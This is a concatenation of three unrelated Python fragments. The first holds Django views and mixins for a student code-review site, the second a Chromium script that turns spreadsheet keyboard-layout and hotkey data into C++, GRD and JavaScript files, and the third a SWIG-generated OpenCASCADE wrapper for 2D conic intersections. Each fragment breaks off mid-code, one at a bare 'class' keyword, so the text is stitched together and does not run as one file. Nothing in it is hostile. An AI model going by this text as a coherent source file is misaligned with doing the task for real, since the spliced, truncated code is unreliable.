class IsReviewerMixin(UserPassesTestMixin):
"""
This Mixin ensures the user is a reviewer
"""
request = None
def test_func(self) -> bool:
"""
This is the function run to test the user
:returns: The user's reviewer status
:rtype: bool
"""
return self.request.user.is_reviewer
class FormNameMixin(ContextMixin):
"""
This Mixin lets Views set a "Form name" to be used in form_base.html
:cvar form_name: The name of the form to display in the pageHeader block
"""
form_name = "Form"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function is run to get additional context data to pass to the template
:returns: Additional context to pass to the template
:rtype: dict
"""
context = super(FormNameMixin, self).get_context_data(**kwargs)
context['formName'] = self.form_name
return context
class FormAlertMixin(FormMixin):
"""
This Mixin lets Forms display success and error messages
:cvar success_message: The message to show when the form is valid
:cvar failure_message: The message to show in the event of an error
"""
request = None
success_message: str = "Complete"
failure_message: str = "The information you provided was incorrect, please correct the errors described below"
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the form is valid.
It adds the success message to the messages framework
:param form: The form that is valid
"""
if self.success_message is not None:
messages.add_message(self.request, messages.SUCCESS, self.success_message)
return super(FormAlertMixin, self).form_valid(form)
def form_invalid(self, form: Form) -> HttpResponse:
"""
This function is run when the form is invalid.
It adds the failure message to the messages framework
:param form: The form that is invalid
"""
if len(form.non_field_errors()) > 0:
for error in form.non_field_errors():
messages.add_message(self.request, messages.ERROR, error)
else:
messages.add_message(self.request, messages.ERROR, self.failure_message)
return super(FormAlertMixin, self).form_invalid(form)
class SuccessDeleteMixin(DeletionMixin):
"""
This Mixin lets Views show a message after a deletion is complete.
:cvar success_message: The message to be displayed when something is deleted successfully.
"""
success_message: str = "Deleted"
request = None
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the deletion has been confirmed by the user.
It adds the success message to the messages framework.
"""
messages.add_message(self.request, messages.SUCCESS, self.success_message)
return super(SuccessDeleteMixin, self).delete(self.request)
# Home
class HomeView(LoginRequiredMixin, TemplateView):
"""
This view is shown when the User goes to the root of the site.
:cvar template_name: The template to render
"""
template_name = "home.html"
def get(self, *args, **kwargs) -> HttpResponse:
"""
This function is run when the user makes a GET request.
It redirects the user to the instructor homepage if they're an instructor.
"""
if self.request.user.email is None or self.request.user.email == "":
return redirect('user-setup', pk=self.request.user.id)
else:
if self.request.user.is_superuser:
return redirect('instructor-home')
else:
return super(HomeView, self).get(*args, **kwargs)
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function gives additional context data to the template.
It gives a list of Reviews related to the user.
:returns: Additional context data for the template
:rtype: dict
"""
context = super(HomeView, self).get_context_data(**kwargs)
user: User = self.request.user
context['active'] = models.Review.objects.filter(student=user).exclude(status=models.Review.Status.CLOSED)
context['completed'] = models.Review.objects.filter((Q(student=user) | Q(reviewer=user))
& Q(status=models.Review.Status.CLOSED))
if user.is_reviewer:
rubrics = models.Review.objects.exclude(status=models.Review.Status.CLOSED).filter(
Q(status=models.Review.Status.OPEN, ) | Q(status=models.Review.Status.ASSIGNED, reviewer=user)
)
context['open'] = rubrics.filter(status=models.Review.Status.OPEN, student__session=user.session).exclude(
student=user)
context['assigned'] = rubrics.filter(status=models.Review.Status.ASSIGNED)
return context
# Reviews
class ReviewCreateView(LoginRequiredMixin, FormNameMixin, FormAlertMixin, CreateView):
"""
This view is used to create (request) a code review
:cvar template_name: The name of the template to render
:cvar success_url: The URL to go to if the creation was successful
:cvar model: The model to create an object for
:cvar form_class: The class of the Form to use
:cvar form_name: The name to put in the pageHeader block
:cvar success_message: The message to display when the creation is successful
"""
template_name = 'form_base.html'
success_url = reverse_lazy('home')
model = models.Review
form_class = forms.ReviewForm
form_name = "Create a Review"
success_message = "New Review Saved"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function defines additional context data to pass to the template
"""
context = super(ReviewCreateView, self).get_context_data(**kwargs)
context['render_no_floating'] = True
return context
def get_form_kwargs(self) -> dict[str, object]:
"""
This function defines additional kwargs to pass to the form's constructor
We give the user object so the Form can save the Review correctly
:returns: Additional kwargs to pass to the Form's constructor
:rtype: dict
"""
kwargs = super().get_form_kwargs()
kwargs['user'] = self.request.user
return kwargs
def form_valid(self, form) -> HttpResponse:
"""
This function is run when the form has been submitted and is valid
It sends an email to all Reviewers telling them about the new Review
"""
response = super(ReviewCreateView, self).form_valid(form)
send_email("Review created by {student}",
"Hello {target_user}, a new review has been created by {student}",
"emails/review_created.html",
self.object,
User.objects.filter(is_reviewer=True, session=self.request.user.session).exclude(
id=self.request.user.id))
return response
class ReviewEditView(LoginRequiredMixin, FormNameMixin, FormAlertMixin, UpdateView):
"""
This view is used to edit a code review
:cvar template_name: The name of the template to render
:cvar success_url: The URL to go to if the edit was successful
:cvar model: The model to edit an object for
:cvar form_class: The class of the form to render
:cvar form_name: The name to put in the pageHeader block
:cvar success_message: The message to display when the edit is successful
"""
template_name = 'form_base.html'
success_url = reverse_lazy('home')
model = models.Review
form_class = forms.ReviewForm
form_name = "Edit Review"
success_message = "Review Updated"
def get_queryset(self) -> QuerySet:
"""
This function defines which Reviews a user can edit
It only lets you edit a review in which you are the student, and it's not graded
:return: A QuerySet defining which Reviews can be edited by this user
:rtype: QuerySet
"""
return models.Review.objects.filter(student=self.request.user).exclude(status=models.Review.Status.CLOSED)
class ReviewCancelView(LoginRequiredMixin, SuccessDeleteMixin, DeleteView):
"""
This view is used to cancel a Review.
This is used by the *student* when they want to cancel a Review before it's done
:cvar template_name: The template to render
:cvar success_url: The URL to redirect to once the Review has been cancelled
:cvar model: The model that will be deleted
:cvar success_message: The message to display when the Review has been cancelled
"""
template_name = 'reviews/review_cancel.html'
success_url = reverse_lazy('home')
model = models.Review
success_message = "Review Cancelled"
def get_context_data(self, **kwargs) -> dict[str, object]:
"""
This function provides additional context data to the template
:returns: Additional context to pass to the template
:rtype: dict
"""
context = super(ReviewCancelView, self).get_context_data(**kwargs)
context['objectString'] = f"review with schoology id: {self.object.schoology_id}"
return context
def get_queryset(self) -> QuerySet:
"""
This function defines what Reviews the user can cancel
It limits it to the Reviews where the user is the student and Reviews that aren't closed
:returns: A QuerySet of Reviews the user can edit
:rtype: QuerySet
"""
return models.Review.objects.filter(student=self.request.user).exclude(status=models.Review.Status.CLOSED)
class | |
<gh_stars>1000+
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Generate keyboard layout and hotkey data for the keyboard overlay.
This script fetches data from the keyboard layout and hotkey data spreadsheet,
and output the data depending on the option.
--cc: Rewrites a part of C++ code in
chrome/browser/chromeos/webui/keyboard_overlay_ui.cc
--grd: Rewrites a part of grd messages in
chrome/app/generated_resources.grd
--js: Rewrites the entire JavaScript code in
chrome/browser/resources/keyboard_overlay/keyboard_overlay_data.js
These options can be specified at the same time.
e.g.
python gen_keyboard_overlay_data.py --cc --grd --js
The output directory of the generated files can be changed with --outdir.
e.g. (This will generate tmp/keyboard_overlay.js)
python gen_keyboard_overlay_data.py --outdir=tmp --js
"""
import cStringIO
import datetime
import gdata.spreadsheet.service
import getpass
import json
import optparse
import os
import re
import sys
MODIFIER_SHIFT = 1 << 0
MODIFIER_CTRL = 1 << 1
MODIFIER_ALT = 1 << 2
KEYBOARD_GLYPH_SPREADSHEET_KEY = '<KEY>'
HOTKEY_SPREADSHEET_KEY = '<KEY>'
CC_OUTDIR = 'chrome/browser/ui/webui/chromeos'
CC_FILENAME = 'keyboard_overlay_ui.cc'
GRD_OUTDIR = 'chrome/app'
GRD_FILENAME = 'chromeos_strings.grdp'
JS_OUTDIR = 'chrome/browser/resources/chromeos'
JS_FILENAME = 'keyboard_overlay_data.js'
CC_START = r'IDS_KEYBOARD_OVERLAY_INSTRUCTIONS_HIDE },'
CC_END = r'};'
GRD_START = r' <!-- BEGIN GENERATED KEYBOARD OVERLAY STRINGS -->'
GRD_END = r' <!-- END GENERATED KEYBOARD OVERLAY STRINGS -->'
LABEL_MAP = {
'glyph_arrow_down': 'down',
'glyph_arrow_left': 'left',
'glyph_arrow_right': 'right',
'glyph_arrow_up': 'up',
'glyph_back': 'back',
'glyph_backspace': 'backspace',
'glyph_brightness_down': 'bright down',
'glyph_brightness_up': 'bright up',
'glyph_enter': 'enter',
'glyph_forward': 'forward',
'glyph_fullscreen': 'full screen',
# Kana/Eisu key on Japanese keyboard
'glyph_ime': u'\u304b\u306a\u0020\u002f\u0020\u82f1\u6570',
'glyph_lock': 'lock',
'glyph_overview': 'switch window',
'glyph_power': 'power',
'glyph_right': 'right',
'glyph_reload': 'reload',
'glyph_search': 'search',
'glyph_shift': 'shift',
'glyph_tab': 'tab',
'glyph_tools': 'tools',
'glyph_volume_down': 'vol. down',
'glyph_volume_mute': 'mute',
'glyph_volume_up': 'vol. up',
};
INPUT_METHOD_ID_TO_OVERLAY_ID = {
'xkb:be::fra': 'fr',
'xkb:be::ger': 'de',
'xkb:be::nld': 'nl',
'xkb:bg::bul': 'bg',
'xkb:bg:phonetic:bul': 'bg',
'xkb:br::por': 'pt_BR',
'xkb:ca::fra': 'fr_CA',
'xkb:ca:eng:eng': 'ca',
'xkb:ch::ger': 'de',
'xkb:ch:fr:fra': 'fr',
'xkb:cz::cze': 'cs',
'xkb:de::ger': 'de',
'xkb:de:neo:ger': 'de_neo',
'xkb:dk::dan': 'da',
'xkb:ee::est': 'et',
'xkb:es::spa': 'es',
'xkb:es:cat:cat': 'ca',
'xkb:fi::fin': 'fi',
'xkb:fr::fra': 'fr',
'xkb:gb:dvorak:eng': 'en_GB_dvorak',
'xkb:gb:extd:eng': 'en_GB',
'xkb:gr::gre': 'el',
'xkb:hr::scr': 'hr',
'xkb:hu::hun': 'hu',
'xkb:il::heb': 'iw',
'xkb:it::ita': 'it',
'xkb:jp::jpn': 'ja',
'xkb:latam::spa': 'es_419',
'xkb:lt::lit': 'lt',
'xkb:lv:apostrophe:lav': 'lv',
'xkb:no::nob': 'no',
'xkb:pl::pol': 'pl',
'xkb:pt::por': 'pt_PT',
'xkb:ro::rum': 'ro',
'xkb:rs::srp': 'sr',
'xkb:ru::rus': 'ru',
'xkb:ru:phonetic:rus': 'ru',
'xkb:se::swe': 'sv',
'xkb:si::slv': 'sl',
'xkb:sk::slo': 'sk',
'xkb:tr::tur': 'tr',
'xkb:ua::ukr': 'uk',
'xkb:us::eng': 'en_US',
'xkb:us::fil': 'en_US',
'xkb:us::ind': 'en_US',
'xkb:us::msa': 'en_US',
'xkb:us:altgr-intl:eng': 'en_US_altgr_intl',
'xkb:us:colemak:eng': 'en_US_colemak',
'xkb:us:dvorak:eng': 'en_US_dvorak',
'xkb:us:intl:eng': 'en_US_intl',
'xkb:us:intl:nld': 'en_US_intl',
'xkb:us:intl:por': 'en_US_intl',
'xkb:us:workman:eng': 'en_US_workman',
'xkb:us:workman-intl:eng': 'en_US_workman_intl',
}
# The file was first generated in 2012 and we have a policy of not updating
# copyright dates.
COPYRIGHT_HEADER=\
"""// Copyright (c) 2012 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
// This is a generated file but may contain local modifications. See
// src/tools/gen_keyboard_overlay_data/gen_keyboard_overlay_data.py --help
"""
# A snippet for grd file
GRD_SNIPPET_TEMPLATE=""" <message name="%s" desc="%s">
%s
</message>
"""
# A snippet for C++ file
CC_SNIPPET_TEMPLATE=""" { "%s", %s },
"""
def SplitBehavior(behavior):
"""Splits the behavior to compose a message or i18n-content value.
Examples:
'Activate last tab' => ['Activate', 'last', 'tab']
'Close tab' => ['Close', 'tab']
"""
return [x for x in re.split('[ ()"-.,]', behavior) if len(x) > 0]
def ToMessageName(behavior):
"""Composes a message name for grd file.
Examples:
'Activate last tab' => IDS_KEYBOARD_OVERLAY_ACTIVATE_LAST_TAB
'Close tab' => IDS_KEYBOARD_OVERLAY_CLOSE_TAB
"""
segments = [segment.upper() for segment in SplitBehavior(behavior)]
return 'IDS_KEYBOARD_OVERLAY_' + ('_'.join(segments))
def ToMessageDesc(description):
"""Composes a message description for grd file."""
message_desc = 'The text in the keyboard overlay to explain the shortcut'
if description:
message_desc = '%s (%s).' % (message_desc, description)
else:
message_desc += '.'
return message_desc
def Toi18nContent(behavior):
"""Composes a i18n-content value for HTML/JavaScript files.
Examples:
'Activate last tab' => keyboardOverlayActivateLastTab
'Close tab' => keyboardOverlayCloseTab
"""
segments = [segment.lower() for segment in SplitBehavior(behavior)]
result = 'keyboardOverlay'
for segment in segments:
result += segment[0].upper() + segment[1:]
return result
def ToKeys(hotkey):
"""Converts the action value to shortcut keys used from JavaScript.
Examples:
'Ctrl - 9' => '9<>CTRL'
'Ctrl - Shift - Tab' => 'tab<>CTRL<>SHIFT'
"""
values = hotkey.split(' - ')
modifiers = sorted(value.upper() for value in values
if value in ['Shift', 'Ctrl', 'Alt', 'Search'])
keycode = [value.lower() for value in values
if value not in ['Shift', 'Ctrl', 'Alt', 'Search']]
# The keys which are highlighted even without modifier keys.
base_keys = ['backspace', 'power']
if not modifiers and (keycode and keycode[0] not in base_keys):
return None
return '<>'.join(keycode + modifiers)
def ParseOptions():
"""Parses the input arguemnts and returns options."""
# default_username = os.getusername() + '@google.com';
default_username = '%s<EMAIL>' % os.environ.get('USER')
parser = optparse.OptionParser()
parser.add_option('--key', dest='key',
help='The key of the spreadsheet (required).')
parser.add_option('--username', dest='username',
default=default_username,
help='Your user name (default: %s).' % default_username)
parser.add_option('--password', dest='password',
help='Your password.')
parser.add_option('--account_type', default='GOOGLE', dest='account_type',
help='Account type used for gdata login (default: GOOGLE)')
parser.add_option('--js', dest='js', default=False, action='store_true',
help='Output js file.')
parser.add_option('--grd', dest='grd', default=False, action='store_true',
help='Output resource file.')
parser.add_option('--cc', dest='cc', default=False, action='store_true',
help='Output cc file.')
parser.add_option('--outdir', dest='outdir', default=None,
help='Specify the directory files are generated.')
(options, unused_args) = parser.parse_args()
if not options.username.endswith('google.com'):
print 'google.com account is necessary to use this script.'
sys.exit(-1)
if (not (options.js or options.grd or options.cc)):
print 'Either --js, --grd, or --cc needs to be specified.'
sys.exit(-1)
# Get the password from the terminal, if needed.
if not options.password:
options.password = <PASSWORD>(
'Application specific password for %s: ' % options.username)
return options
def InitClient(options):
"""Initializes the spreadsheet client."""
client = gdata.spreadsheet.service.SpreadsheetsService()
client.email = options.username
client.password = options.password
client.source = 'Spread Sheet'
client.account_type = options.account_type
print 'Logging in as %s (%s)' % (client.email, client.account_type)
client.ProgrammaticLogin()
return client
def PrintDiffs(message, lhs, rhs):
"""Prints the differences between |lhs| and |rhs|."""
dif = set(lhs).difference(rhs)
if dif:
print message, ', '.join(dif)
def FetchSpreadsheetFeeds(client, key, sheets, cols):
"""Fetch feeds from the spreadsheet.
Args:
client: A spreadsheet client to be used for fetching data.
key: A key string of the spreadsheet to be fetched.
sheets: A list of the sheet names to read data from.
cols: A list of columns to read data from.
"""
worksheets_feed = client.GetWorksheetsFeed(key)
print 'Fetching data from the worksheet: %s' % worksheets_feed.title.text
worksheets_data = {}
titles = []
for entry in worksheets_feed.entry:
worksheet_id = entry.id.text.split('/')[-1]
list_feed = client.GetListFeed(key, worksheet_id)
list_data = []
# Hack to deal with sheet names like 'sv (Copy of fl)'
title = list_feed.title.text.split('(')[0].strip()
titles.append(title)
if title not in sheets:
continue
print 'Reading data from the sheet: %s' % list_feed.title.text
for i, entry in enumerate(list_feed.entry):
line_data = {}
for k in entry.custom:
if (k not in cols) or (not entry.custom[k].text):
continue
line_data[k] = entry.custom[k].text
list_data.append(line_data)
worksheets_data[title] = list_data
PrintDiffs('Exist only on the spreadsheet: ', titles, sheets)
PrintDiffs('Specified but do not exist on the spreadsheet: ', sheets, titles)
return worksheets_data
def FetchKeyboardGlyphData(client):
"""Fetches the keyboard glyph data from the spreadsheet."""
glyph_cols = ['scancode', 'p0', 'p1', 'p2', 'p3', 'p4', 'p5', 'p6', 'p7',
'p8', 'p9', 'label', 'format', 'notes']
keyboard_glyph_data = FetchSpreadsheetFeeds(
client, KEYBOARD_GLYPH_SPREADSHEET_KEY,
INPUT_METHOD_ID_TO_OVERLAY_ID.values(), glyph_cols)
ret = {}
for lang in keyboard_glyph_data:
ret[lang] = {}
keys = {}
for line in keyboard_glyph_data[lang]:
scancode = line.get('scancode')
if (not scancode) and line.get('notes'):
ret[lang]['layoutName'] = line['notes']
continue
del line['scancode']
if 'notes' in line:
del line['notes']
if 'label' in line:
line['label'] = LABEL_MAP.get(line['label'], line['label'])
keys[scancode] = line
# Add a label to space key
if '39' not in keys:
keys['39'] = {'label': 'space'}
ret[lang]['keys'] = keys
return ret
def FetchLayoutsData(client):
"""Fetches the keyboard glyph data from the spreadsheet."""
layout_names = ['U_layout', 'J_layout', 'E_layout', 'B_layout']
cols = ['scancode', 'x', 'y', 'w', 'h']
layouts = FetchSpreadsheetFeeds(client, KEYBOARD_GLYPH_SPREADSHEET_KEY,
layout_names, cols)
ret = {}
for layout_name, layout in layouts.items():
ret[layout_name[0]] = []
for row in layout:
line = []
for col in cols:
value = row.get(col)
if not value:
line.append('')
else:
if col != 'scancode':
value = float(value)
line.append(value)
ret[layout_name[0]].append(line)
return ret
def FetchHotkeyData(client):
"""Fetches the hotkey data from the spreadsheet."""
hotkey_sheet = ['Cross Platform Behaviors']
hotkey_cols = ['behavior', 'context', 'kind', 'actionctrlctrlcmdonmac',
'chromeos', 'descriptionfortranslation']
hotkey_data = FetchSpreadsheetFeeds(client, HOTKEY_SPREADSHEET_KEY,
hotkey_sheet, hotkey_cols)
action_to_id = {}
id_to_behavior = {}
# (behavior, action)
result = []
for line in hotkey_data['Cross Platform Behaviors']:
if (not line.get('chromeos')) or (line.get('kind') != 'Key'):
continue
action = ToKeys(line['actionctrlctrlcmdonmac'])
if not action:
continue
behavior = line['behavior'].strip()
description = line.get('descriptionfortranslation')
result.append((behavior, action, description))
return result
def UniqueBehaviors(hotkey_data):
"""Retrieves a sorted list of unique behaviors from |hotkey_data|."""
return sorted(set((behavior, description) for (behavior, _, description)
in hotkey_data),
cmp=lambda x, y: cmp(ToMessageName(x[0]), ToMessageName(y[0])))
def GetPath(path_from_src):
"""Returns | |
# This file was automatically generated by SWIG (http://www.swig.org).
# Version 3.0.1
#
# Do not make changes to this file unless you know what you are doing--modify
# the SWIG interface file instead.
from sys import version_info
if version_info >= (3,0,0):
new_instancemethod = lambda func, inst, cls: _IntAna2d.SWIG_PyInstanceMethod_New(func)
else:
from new import instancemethod as new_instancemethod
if version_info >= (2,6,0):
def swig_import_helper():
from os.path import dirname
import imp
fp = None
try:
fp, pathname, description = imp.find_module('_IntAna2d', [dirname(__file__)])
except ImportError:
import _IntAna2d
return _IntAna2d
if fp is not None:
try:
_mod = imp.load_module('_IntAna2d', fp, pathname, description)
finally:
fp.close()
return _mod
_IntAna2d = swig_import_helper()
del swig_import_helper
else:
import _IntAna2d
del version_info
try:
_swig_property = property
except NameError:
pass # Python < 2.2 doesn't have 'property'.
def _swig_setattr_nondynamic(self,class_type,name,value,static=1):
if (name == "thisown"): return self.this.own(value)
if (name == "this"):
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name,None)
if method: return method(self,value)
if (not static):
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self,class_type,name,value):
return _swig_setattr_nondynamic(self,class_type,name,value,0)
def _swig_getattr(self,class_type,name):
if (name == "thisown"): return self.this.own()
method = class_type.__swig_getmethods__.get(name,None)
if method: return method(self)
raise AttributeError(name)
def _swig_repr(self):
try: strthis = "proxy of " + self.this.__repr__()
except: strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
try:
_object = object
_newclass = 1
except AttributeError:
class _object : pass
_newclass = 0
def _swig_setattr_nondynamic_method(set):
def set_attr(self,name,value):
if (name == "thisown"): return self.this.own(value)
if hasattr(self,name) or (name == "this"):
set(self,name,value)
else:
raise AttributeError("You cannot add attributes to %s" % self)
return set_attr
class SwigPyIterator(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract")
__repr__ = _swig_repr
__swig_destroy__ = _IntAna2d.delete_SwigPyIterator
def __iter__(self): return self
SwigPyIterator.value = new_instancemethod(_IntAna2d.SwigPyIterator_value,None,SwigPyIterator)
SwigPyIterator.incr = new_instancemethod(_IntAna2d.SwigPyIterator_incr,None,SwigPyIterator)
SwigPyIterator.decr = new_instancemethod(_IntAna2d.SwigPyIterator_decr,None,SwigPyIterator)
SwigPyIterator.distance = new_instancemethod(_IntAna2d.SwigPyIterator_distance,None,SwigPyIterator)
SwigPyIterator.equal = new_instancemethod(_IntAna2d.SwigPyIterator_equal,None,SwigPyIterator)
SwigPyIterator.copy = new_instancemethod(_IntAna2d.SwigPyIterator_copy,None,SwigPyIterator)
SwigPyIterator.next = new_instancemethod(_IntAna2d.SwigPyIterator_next,None,SwigPyIterator)
SwigPyIterator.__next__ = new_instancemethod(_IntAna2d.SwigPyIterator___next__,None,SwigPyIterator)
SwigPyIterator.previous = new_instancemethod(_IntAna2d.SwigPyIterator_previous,None,SwigPyIterator)
SwigPyIterator.advance = new_instancemethod(_IntAna2d.SwigPyIterator_advance,None,SwigPyIterator)
SwigPyIterator.__eq__ = new_instancemethod(_IntAna2d.SwigPyIterator___eq__,None,SwigPyIterator)
SwigPyIterator.__ne__ = new_instancemethod(_IntAna2d.SwigPyIterator___ne__,None,SwigPyIterator)
SwigPyIterator.__iadd__ = new_instancemethod(_IntAna2d.SwigPyIterator___iadd__,None,SwigPyIterator)
SwigPyIterator.__isub__ = new_instancemethod(_IntAna2d.SwigPyIterator___isub__,None,SwigPyIterator)
SwigPyIterator.__add__ = new_instancemethod(_IntAna2d.SwigPyIterator___add__,None,SwigPyIterator)
SwigPyIterator.__sub__ = new_instancemethod(_IntAna2d.SwigPyIterator___sub__,None,SwigPyIterator)
SwigPyIterator_swigregister = _IntAna2d.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
import OCC.gp
import OCC.Standard
class IntAna2d_AnaIntersection(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
* Empty constructor. IsDone returns False.
:rtype: None
* Intersection between two lines.
:param L1:
:type L1: gp_Lin2d
:param L2:
:type L2: gp_Lin2d
:rtype: None
* Intersection between two circles.
:param C1:
:type C1: gp_Circ2d
:param C2:
:type C2: gp_Circ2d
:rtype: None
* Intersection between a line and a circle.
:param L:
:type L: gp_Lin2d
:param C:
:type C: gp_Circ2d
:rtype: None
* Intersection between a line and a conic.
:param L:
:type L: gp_Lin2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a circle and another conic.
:param C:
:type C: gp_Circ2d
:param Co:
:type Co: IntAna2d_Conic &
:rtype: None
* Intersection between an ellipse and another conic.
:param E:
:type E: gp_Elips2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a parabola and another conic.
:param P:
:type P: gp_Parab2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between an hyperbola and another conic.
:param H:
:type H: gp_Hypr2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
"""
_IntAna2d.IntAna2d_AnaIntersection_swiginit(self,_IntAna2d.new_IntAna2d_AnaIntersection(*args))
def Perform(self, *args):
"""
* Intersection between two lines.
:param L1:
:type L1: gp_Lin2d
:param L2:
:type L2: gp_Lin2d
:rtype: None
* Intersection between two circles.
:param C1:
:type C1: gp_Circ2d
:param C2:
:type C2: gp_Circ2d
:rtype: None
* Intersection between a line and a circle.
:param L:
:type L: gp_Lin2d
:param C:
:type C: gp_Circ2d
:rtype: None
* Intersection between a line and a conic.
:param L:
:type L: gp_Lin2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a circle and another conic.
:param C:
:type C: gp_Circ2d
:param Co:
:type Co: IntAna2d_Conic &
:rtype: None
* Intersection between an ellipse and another conic.
:param E:
:type E: gp_Elips2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between a parabola and another conic.
:param P:
:type P: gp_Parab2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
* Intersection between an hyperbola and another conic.
:param H:
:type H: gp_Hypr2d
:param C:
:type C: IntAna2d_Conic &
:rtype: None
"""
return _IntAna2d.IntAna2d_AnaIntersection_Perform(self, *args)
def IsDone(self, *args):
"""
* Returns True if the computation was succesfull.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IsDone(self, *args)
def IsEmpty(self, *args):
"""
* Returns True when there is no intersection, i-e - no intersection point - the elements are not identical. The element may be parallel in this case.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IsEmpty(self, *args)
def IdenticalElements(self, *args):
"""
* For the intersection between an element of gp and a conic known by an implicit equation, the result will be True if the element of gp verifies the implicit equation. For the intersection between two Lin2d or two Circ2d, the result will be True if the elements are identical. The function returns False in all the other cases.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_IdenticalElements(self, *args)
def ParallelElements(self, *args):
"""
* For the intersection between two Lin2d or two Circ2d, the function returns True if the elements are parallel. The function returns False in all the other cases.
:rtype: bool
"""
return _IntAna2d.IntAna2d_AnaIntersection_ParallelElements(self, *args)
def NbPoints(self, *args):
"""
* returns the number of IntPoint between the 2 curves.
:rtype: int
"""
return _IntAna2d.IntAna2d_AnaIntersection_NbPoints(self, *args)
def Point(self, *args):
"""
* returns the intersection point of range N; If (N<=0) or (N>NbPoints), an exception is raised.
:param N:
:type N: int
:rtype: IntAna2d_IntPoint
"""
return _IntAna2d.IntAna2d_AnaIntersection_Point(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
IntAna2d_AnaIntersection.Perform = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_Perform,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IsDone = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IsDone,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IsEmpty = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IsEmpty,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.IdenticalElements = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_IdenticalElements,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.ParallelElements = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_ParallelElements,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.NbPoints = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_NbPoints,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection.Point = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection_Point,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection._kill_pointed = new_instancemethod(_IntAna2d.IntAna2d_AnaIntersection__kill_pointed,None,IntAna2d_AnaIntersection)
IntAna2d_AnaIntersection_swigregister = _IntAna2d.IntAna2d_AnaIntersection_swigregister
IntAna2d_AnaIntersection_swigregister(IntAna2d_AnaIntersection)
class IntAna2d_Conic(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C:
:type C: gp_Circ2d
:rtype: None
:param C:
:type C: gp_Lin2d
:rtype: None
:param C:
:type C: gp_Parab2d
:rtype: None
:param C:
:type C: gp_Hypr2d
:rtype: None
:param C:
:type C: gp_Elips2d
:rtype: None
"""
_IntAna2d.IntAna2d_Conic_swiginit(self,_IntAna2d.new_IntAna2d_Conic(*args))
def Value(self, *args):
"""
* value of the function F at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:rtype: float
"""
return _IntAna2d.IntAna2d_Conic_Value(self, *args)
def Grad(self, *args):
"""
* returns the value of the gradient of F at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:rtype: gp_XY
"""
return _IntAna2d.IntAna2d_Conic_Grad(self, *args)
def ValAndGrad(self, *args):
"""
* Returns the value of the function and its gradient at the point X,Y.
:param X:
:type X: float
:param Y:
:type Y: float
:param Val:
:type Val: float &
:param Grd:
:type Grd: gp_XY
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_ValAndGrad(self, *args)
def Coefficients(self, *args):
"""
* returns the coefficients of the polynomial equation wich defines the conic: A.X**2 + B.Y**2 + 2.C.X*Y + 2.D.X + 2.E.Y + F = 0.
:param A:
:type A: float &
:param B:
:type B: float &
:param C:
:type C: float &
:param D:
:type D: float &
:param E:
:type E: float &
:param F:
:type F: float &
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_Coefficients(self, *args)
def NewCoefficients(self, *args):
"""
* Returns the coefficients of the polynomial equation ( written in the natural coordinates system ) A x x + B y y + 2 C x y + 2 D x + 2 E y + F in the local coordinates system defined by Axis
:param A:
:type A: float &
:param B:
:type B: float &
:param C:
:type C: float &
:param D:
:type D: float &
:param E:
:type E: float &
:param F:
:type F: float &
:param Axis:
:type Axis: gp_Ax2d
:rtype: None
"""
return _IntAna2d.IntAna2d_Conic_NewCoefficients(self, *args)
def __del__(self):
try:
self.thisown = False
GarbageCollector.garbage.collect_object(self)
except:
pass
IntAna2d_Conic.Value = new_instancemethod(_IntAna2d.IntAna2d_Conic_Value,None,IntAna2d_Conic)
IntAna2d_Conic.Grad = new_instancemethod(_IntAna2d.IntAna2d_Conic_Grad,None,IntAna2d_Conic)
